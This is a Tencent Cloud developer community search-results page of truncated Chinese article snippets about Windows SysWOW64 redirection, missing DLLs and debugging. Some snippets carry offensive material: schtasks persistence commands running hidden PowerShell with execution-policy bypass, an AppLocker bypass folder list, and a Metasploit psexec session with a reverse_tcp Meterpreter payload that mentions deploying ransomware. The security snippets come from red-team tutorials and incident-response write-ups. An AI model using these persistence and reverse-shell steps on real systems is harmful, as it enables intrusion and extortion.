Windows API SysWOW重定向意外行为 - 腾讯云开发者社区

文章/答案/技术大牛

发布

Windows内核开发-9-32位和64位的区别

系统文件重定向(File System Redirector) Windows64位OS包含了两个System32文件，一个是System32另一个是SysWow64。...默认情况下的安装路径%Windows%\System32和%Windows%\SysWow64。...文件夹下面创建的，那么说明我们前面的讲述没问题，确实是重定向到了SysWow64里面。...这里就会用到两个API： BOOL Wow64DisableWow64FsRedirection( [out] PVOID *OldValue );//关闭重定向，将原来的值保存到输入参数oldvalue...DIY注册表重定向在创建注册表的API上加一个宏定义就可完美解决这个问题了： RegCreateKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Test")

1.2K4 0

Windows x64上的x86重定向

在x86的机器上，我们程序调用的regedit的路径是C:\windows\regedit.exe；而在x86_64上，程序调用的regedit的路径是C:\windows\SysWOW64\regedit.exe...其中SysWOW64(System Windows on Windows64)是windows的一个兼容层，用来在x86_64的机器上运行x86程序。...32bit程序运行时会收到重定向的影响，这个重定向主要分为：文件重定向当32bit程序运行时，会存在以下的重定向规则。...访问重定向 %systemroot%/system32 %systemroot%/SysWOW64 比如，当32bit程序访问calc.exe时，本应访问 C:\windows\system32\calc.exe...但是由于重定向机制，会被重定向到 C:\windwos\SysWOW64\calc.exe 注册表重定向不多说，想了解的话看看微软的文章。

2.2K8 0

您找到你想要的搜索结果了吗？

是的

没有找到

记一个真实的应急响应案例（6）wmiex恶意程序事件

一、恶意程序使用命令netstat -nao查看网络连接情况，意外发现存在异常网络连接，进程ID（PID）是1748。...couxxltk.exe、C:\windows\syswow64\wmiex.exe、C:\windows\syswow64\drivers\svchost.exe、C:\windows\syswow64...\syswow64\svhost.exe 在恶意程序C:\windows\syswow64\wmiex.exe的路径下按修改日期排序，发现可执行文件C:\windows\syswow64\svhost.exe...C:\windows\syswow64\svhost.exe一致，确认是恶意程序，后续需备份后删除。...1.6、C:\windows\syswow64\drivers\taskmgr.exe 将可执行文件C:\windows\syswow64\drivers\taskmgr.exe上传到微步沙箱和virustotal

4391 0

如何使用TinyTracer跟踪API调用

TinyTracer是一款功能强大的API调用跟踪工具，在该工具的帮助下，广大研究人员能够轻松实现API的调用跟踪。...\SysWOW64\kernel32.dll.IsProcessorFeaturePresent 3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW...3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress 3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx...398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc 3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue...49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW 4934b;called: C:\Windows\SysWOW64\kernel32

1.3K1 0

.NET平台处理32位系统和64位系统的一点兼容性问题

64位系统下，使用32位程序访问注册表的话，节点会被自动重定向到Wow6432Node节点下。...一般情况下是C:\Windows\System32，作用和Linux系统下的/usr/share/类似。...但是由于32位和64位系统的不同，因此32位程序所需要的库等都被放置在了%windir%\SysWOW64下。...为了保证兼容性，32位程序在64位系统下访问System32文件夹的时候，会被重定向到SysWOW64下，这个特性叫做文件系统重定向。以下文件夹不会被重定向，32位和64位程序都可以访问。

1.3K1 0

运行CrossWalk报错：计算机中丢失 api-ms-win-core-winrt-string-l1-1-0.dll

如下：无法启动此程序，因为计算机中丢失 api-ms-win-core-winrt-string-l1-1-0.dll。......检查了一下Windows7的C:\Windows\System32和C:\Windows\SysWOW64目录，发现里面有很多api-ms-win-xxx的dll，但确实没有 api-ms-win-core-winrt-string-l1...-1-0.dll和api-ms-win-core-winrt-l1-1-0.dll库。...解决办法在 https://cn.dll-files.com/ 网站上下载这两个库，并将其放入C:\Windows\System32和C:\Windows\SysWOW64目录下，然后再次运行 xwalk...注：这个问题在自己的Windows10上并不存在。

4.2K7 0

.NET 高级调试：CLR和Windows加载器及应用程序域

Net应用程序 NET 应用程序，更多的指的是用户编写的应用程序，比如：基于 Winform 的ERP，基于 MVC、API 实现的网站系统。...75fd3000 C:\Windows\SysWOW64\GDI32.dll ModLoad: 709f0000 70a04000 C:\Windows\SysWOW64\VCRUNTIME140...: 74fa0000 74fc5000 C:\Windows\SysWOW64\IMM32.DLL ModLoad: 75ff0000 76270000 C:\Windows\SysWOW64\...C:\Windows\SysWOW64\msvcrt.dll ModLoad: 76e30000 76ea5000 C:\Windows\SysWOW64\sechost.dll ModLoad..._RtlUserThreadStart+0x1b（ntdll是windows 32位的API）第12行代码就是 mscoree.dll 执行 _CorExeMain 方法，初始化环境，10 行代码加载

1K2 0

api-ms-win-crt-runtimel1-1-0.dll缺失的终极解决方案

这个问题就是你本地api-ms-win-crt-runtime-l1-1-0.dll 版本过低或者不存在；我遇到的问题是：我的电脑（64位）C:\Windows\System32里面不存在api-ms-win-crt-runtime-l1...-1-0.dll，但是C:\Windows\SysWOW64里面有。...解决方法如下：（1）把C:\Windows\SysWOW64的api-ms-win-crt-runtime-l1-1-0.dll删除掉。...（2）重新安装api-ms-win-crt-runtime-l1-1-0.dll（其实这个就是VC redit.exe里面的）安装VC redit.exe程序解决是VC的一个程序：VC redit.exe

7.7K3 0

2012R2原版ISO安装系统后netstat命令的回显很慢，一行一行显示

前不久用server2012R2原版ISO安装系统测试个问题，意外发现2012R2原版ISO安装系统后netstat命令的回显很慢，一行一行显示，不是一次性显示全部结果，而高版本系统、打过补丁的2012R2...提权图片提权后的cmd命令行执行：copy /y 源文件路径目标文件路径这样替换了这2个路径的netstat.exe后，执行命令报错（报错当时没截图，总之，是命令执行不了的那种弹窗式报错，不是回显里报错）C:\Windows...\System32\NETSTAT.EXEC:\Windows\SysWOW64\NETSTAT.EXE最后不得不尝试更新，耐心等待更新完成后检验效果，可喜的是，更新后netstat命令的回显正常了。

8543 0

inno setup读取注册表遇到的一个坑

其中，prm文件需要复制到PR公共插件目录下，DLL需要复制到Windows系统目录中去，这样插件才能正常的工作。...32bit程序对注册表HKEY_LOCAL_MACHINE根下的项目操作都进行了重定向：读取HKEY_LOCAL_MACHINE\SOFTWARE下的键值都会重定向到HKEY_LOCAL_MACHINE...EnableFsRedirection(OldState); end; end; end; 关键就是通过调用EnableFsRedirection()函数来禁用注册表操作转发行为...Update 2016-3-7: 在64Bit系统上，将动态库文件拷贝到C:\WINDOWS\System32目录下时，会自动重定向到SysWOW64目录下，导致程序运行异常。...这事可以通过设置在[Files]段设置Flags:64即可禁用目录重定向（参考链接）。三、参考链接 1、http://www.jrsoftware.org/ishelp/index.php?

3.3K6 1

应急响应系列之利用ProcessMonitor进行恶意文件分析

针对病毒的相应行为进行反制，如病毒在c:\windows\下创建了1.exe文件，专杀就是到c:\windows\下找到这个文件并删除(根据MD5判断是否是同一个文件) 说起来很简单，但是在真实的实战中...\SysWOW64\wmiex.exe"&schtasks /run /TN WebServers) # 终止svhost.exe、svhhost.exe、svvhost.exe、wmiex.exe进程...\temp\svchost.exe & delc:\windows\system32\svhhost.exe & del c:\windows\syswow64\svhhost.exe taskkill...4.4 注册表行为分析创建两个启动项 1.创建名为Ddriver启动项，加载c:\windows\SysWOW64\drivers\svchost.exe ?...2.创建名为WebServers的启动项，启动加载c:\windows\SysWOW64\wmiex.exe ?

2.6K2 0

初学者下载使用Python遇到的问题看它

下载一个该dll文件：把该文件保存在路径：C:\Windows\SysWOW64 在官网下载组件： https://support.microsoft.com/en-gb/help/2999226.../update-for-universal-c-runtime-in-windows 如果你系统是32位的：把x32文件夹下的api-ms-win-crt-process-l1-1-0.dll放到C:\...Windows\System32目录下即可如果系统是64位的：把x64文件夹下的api-ms-win-crt-process-l1-1-0.dll放到C:\Windows\System32目录下然后为了兼容性更好...，再把x32位文件夹下api-ms-win-crt-process-l1-1-0.dll放到C:\Windows\SysWOW64目录下 2、安装完后提示api-ms-win-crt-runtimel1...-1-0.dll 丢失 api-ms-win-crt-runtime就是MFC的运行时环境的库，python在windows上编译也是用微软的visual studio C++编译的，底层也会用到微软提供的

1.2K3 0

Windows权限提升之AppLocker绕过

AppLocker绕过 – 默认可写文件夹我们可以看到api0cradle在 C:\Windows\* 中找到的一些默认情况下标准用户可写入的文件夹列表： https://github.com/api0cradle...C:\windows\tracing C:\Windows\Registration\CRMLog C:\Windows\System32\FxsTmp C:\Windows\System32\com...Windows\SyncCenter C:\Windows\System32\Tasks_Migerated（执行 Windows 10 版本升级后） C:\Windows\SysWOW64\FxsTmp...C:\Windows\SysWOW64\com\dmp C:\Windows\SysWOW64\Tasks\Microsoft \Windows\SyncCenter C:\Windows\SysWOW64...有关绕过 AppLocker 的更多方法，请查看此处的 GitHub https://github.com/api0cradle/UltimateAppLockerByPassList

1.1K5 0

.net core 丢失 api-ms-win-crt-runtime-l1-1-0.dll

今天在服务器上安装完.net core，执行的时候发现提示丢失api-ms-win-crt-runtime-l1-1-0.dll写下解决过程给大家来参考 api-ms-win-crt-runtime是MFC...id=48145 如果无法解决，可以在C:\Windows\System32和C:\Windows\SysWOW64目录检查下是否有api-ms-win-crt-runtime-l1-1-0.dll删除后重试即可

2.6K8 0

利用计划任务进行权限维持的几种姿势

这种行为可作为一种持久性机制被red team利用。通过计划任务执行持久性不需要管理员权限，但如果已获得提升的权限，则允许进一步操作，例如在用户登录期间或在空闲状态期间执行任务。...schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle...#(X64) - On System Start schtasks /create /tn PentestLab /tr "c:\windows\syswow64\WindowsPowerShell\v1.0...\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass...schtasks /CREATE /TN "Windows Update" /TR "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

3.2K2 0

定制 Fiddler 之抓获 WinHTTP 请求

背景发现使用 Fiddler 进行抓包时有一部分请求总是没抓到，查看了一下源代码，发现使用 WinINET 这套 API 发送的请求都能正常抓到，而使用 WinHTTP 这套 API 发送的请求都没有抓到...Eric 的那篇博客里已经列出了相关的方法和代码，本文只是对其略做改进，让同一段代码可以适配不同的 Windows 版本。...这些通过 Windows 自带命令就可以做到：在 XP 下： proxycfg -u 在 Win7 下（使用管理员权限的命令行）： netsh winhttp import proxy ie 注：在...Win7 64 位系统下需要将 System32 目录和 SysWOW64 目录下的 netsh 命令各执行一次，下方将给出的脚本已覆盖这种情况。...oPSI.FileName = oPSI.FileName = Environment.SystemDirectory.Replace("system32", "syswow64

7664 0

微软Internet Explorer浏览器Jscript.Dll组件远程代码执行漏洞

受影响范围受影响范围： IE 11 Windows 7Windows 8.1Windows 10Windows Server 2012/R2Windows Server 2008Windows...Server 2016Windows Server 2019 IE 10 Windows Server 2012 IE 9 Windows Server 2008 可能的攻击风险演化 1) 从威胁框架角度...，这是一个从接触目标与进攻突防角度具有高风险的可利用漏洞，该漏洞曝光前可能被超级网空威胁行为体在类似QUANTUM系统中，用于对高价值目标打点，对此需要进一步的排查分析。...windir%\system32\jscript.dll /E /P everyone:N 2、在64位操作系统中，可以通过以下命令限制对JScript.dll的访问： takeown /f %windir%\syswow64...\jscript.dll cacls %windir%\syswow64\jscript.dll /E /P everyone:N takeown /f %windir%\system32\jscript.dll

8760 0

1.安卓逆向学习入门记录

getsign / APK 上上签安卓模拟器：雷电(快速) / 海马玩(稳定) 常用软件: adb.exe / RE文件管理器 / MT 管理器基础软件安装: # 静默安装 jdk-8u251-windows-x64...注意事项: 1.JDK与NDK的配置路径中不能有中文和空格； 2.安装包文件不全则运行会出错; 3.安装完成后需要校验设置的环境变量; 4.如果在运行ndk-build提示api-ms-win-crt-convert-l1...-1-0.dll找不到时候将本机的32位与64位分别放置于system32、SysWOW64目录之中然后注册该DLL;@echo 开始注册 copy api-ms-win-crt-convert-l1-...1-0.dll %windir%\sysWOW64 regsvr32 %windir%\sysWOW64\api-ms-win-crt-convert-l1-1-0.dll /s @pause 0x02

1.2K2 0

定制 Fiddler 之抓获 WinHTTP 请求

背景发现使用 Fiddler 进行抓包时有一部分请求总是没抓到，查看了一下源代码，发现使用 WinINET 这套 API 发送的请求都能正常抓到，而使用 WinHTTP 这套 API 发送的请求都没有抓到...Eric 的那篇博客里已经列出了相关的方法和代码，本文只是对其略做改进，让同一段代码可以适配不同的 Windows 版本。...这些通过 Windows 自带命令就可以做到：在 XP 下： proxycfg -u 在 Win7 下（使用管理员权限的命令行）： netsh winhttp import proxy ie...注：在 Win7 64 位系统下需要将 System32 目录和 SysWOW64 目录下的 netsh 命令各执行一次，下方将给出的脚本已覆盖这种情况。...oPSI.FileName = oPSI.FileName = Environment.SystemDirectory.Replace("system32", "syswow64

1.3K1 0

红队白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索

/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows.../smb/psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp...msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.56 RHOSTS => 192.168.1.56 msf6 exploit(windows...： L 表示用户退出连接后重新进行端口侦听 d 后台运行 p 指定端口 -e prog 程序重定向，一旦连接，就执行 meterpreter > shell 补充：防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行...\SysWOW64>exit MSF 控制台连接 msf6 > connect 192.168.1.56 443 退出，使用 Ctrl+c 退出即可 2.扩展前面可以上传 nc 程序，当然也可以上传勒索病毒过程如下

2471 0

点击加载更多

Windows内核开发-9-32位和64位的区别

Windows x64上的x86重定向

记一个真实的应急响应案例（6）wmiex恶意程序事件

如何使用TinyTracer跟踪API调用

.NET平台处理32位系统和64位系统的一点兼容性问题

运行CrossWalk报错：计算机中丢失 api-ms-win-core-winrt-string-l1-1-0.dll

.NET 高级调试：CLR和Windows加载器及应用程序域

api-ms-win-crt-runtimel1-1-0.dll缺失的终极解决方案

2012R2原版ISO安装系统后netstat命令的回显很慢，一行一行显示

inno setup读取注册表遇到的一个坑

应急响应系列之利用ProcessMonitor进行恶意文件分析

初学者下载使用Python遇到的问题看它

Windows权限提升之AppLocker绕过

.net core 丢失 api-ms-win-crt-runtime-l1-1-0.dll

利用计划任务进行权限维持的几种姿势

定制 Fiddler 之抓获 WinHTTP 请求

微软Internet Explorer浏览器Jscript.Dll组件远程代码执行漏洞

1.安卓逆向学习入门记录

定制 Fiddler 之抓获 WinHTTP 请求

红队白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐